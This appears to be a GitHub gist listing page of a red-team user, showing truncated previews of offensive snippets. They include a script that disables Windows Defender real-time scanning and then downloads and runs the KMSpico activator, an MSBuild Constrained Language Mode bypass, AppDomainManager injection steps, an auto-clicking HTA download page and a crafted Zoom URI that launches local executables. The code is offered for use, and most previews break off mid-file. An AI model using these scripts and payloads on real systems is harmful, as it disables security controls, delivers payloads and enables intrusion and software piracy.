GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
Curtis Ringwald C0axx
C0axx
/ Install_kmspico.ps1
Created
August 13, 2020 01:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $KMSUrl = "https://codeload.github.com/charygao/KMSpico_v10.2.0/zip/master" | |
| $KMSDst = "C:\windows\temp\KMSpico.zip" | |
| $KMSUnzip = "C:\windows\temp\KMSPico" | |
| $KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe" | |
| if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2016" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2019") { | |
| Write-Host -ForegroundColor Green "[+] Temporarily disabling Windows Defender Real time Scanning" | |
| Set-MpPreference -ExclusionPath C:\windows\temp | |
| set-MpPreference -DisableRealtimeMonitoring $true |
C0axx
/ _Instructions_Reproduce.md
Created
April 29, 2020 20:36
GhostLoader - AppDomainManager - Injection - 攻壳机动队
C0axx
/ CLMBypass.csproj
Created
April 9, 2020 16:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="Bypass"> | |
| <CLMBypass/> | |
| </Target> | |
| <UsingTask | |
| TaskName="CLMBypass" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Reference Include="System.Management.Automation" /> |
C0axx
/ Static python executable.txt
Created
April 7, 2020 19:30
— forked from 0xhexmex/Static python executable.txt
How to turn a python script into a statically linked executable with pyinstaller and staticx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Example below is with mitm6 (https://github.com/fox-it/mitm6/) | |
| // Note: Adding the '--add-binary' option here is specific to mitm6, not required in all cases. | |
| # pip install pyinstaller | |
| # pyinstaller --clean -F --add-binary="/usr/lib/x86_64-linux-gnu/libpython2.7.so.1.0:." ./mitm6.py | |
| // The step above will create a single binary in the ./dist/ directory called mitm6 | |
| // Install staticx and dependencies |
C0axx
/ c99-nl.py
Created
April 5, 2020 18:47
— forked from si9int/c99-nl.py
Automates https://subdomainfinder.c99.nl | Usage: python3 c99-nl.py <domain.com> | Requirements: pip3 install bs4
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests, sys | |
| from bs4 import BeautifulSoup as bs | |
| domain = sys.argv[1] | |
| subdomains = [] | |
| params = { | |
| 'CSRF102664102' : 'geek100526529', | |
| 'CSRF105639185' : 'espionage103090877', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Usage to build a custom url | |
| // sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg" | |
| // Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3Il |
C0axx
/ downloader.html
Created
January 30, 2020 18:47
— forked from rvrsh3ll/downloader.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a href="#" id="download">legit</al> | |
| <script> | |
| var element = document.getElementById("download"); | |
| element.href = "legit.hta"; | |
| element.click(); | |
| </script> |
C0axx
/ 6x_2080_Hashcat-benchmark.md
Created
March 2, 2019 17:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## 6x Nvidia RTX 2080 (08G-P4-2080-KR Blower cards) Hashcat Benchmarks | |
| ### Benchmarks | |
| #### Stock Clocks | |
| ```bash | |
| hashcat (v5.1.0-634-gbfdeb6ea) starting in benchmark mode... | |
| Benchmarking uses hand-optimized kernel code by default. |
NewerOlder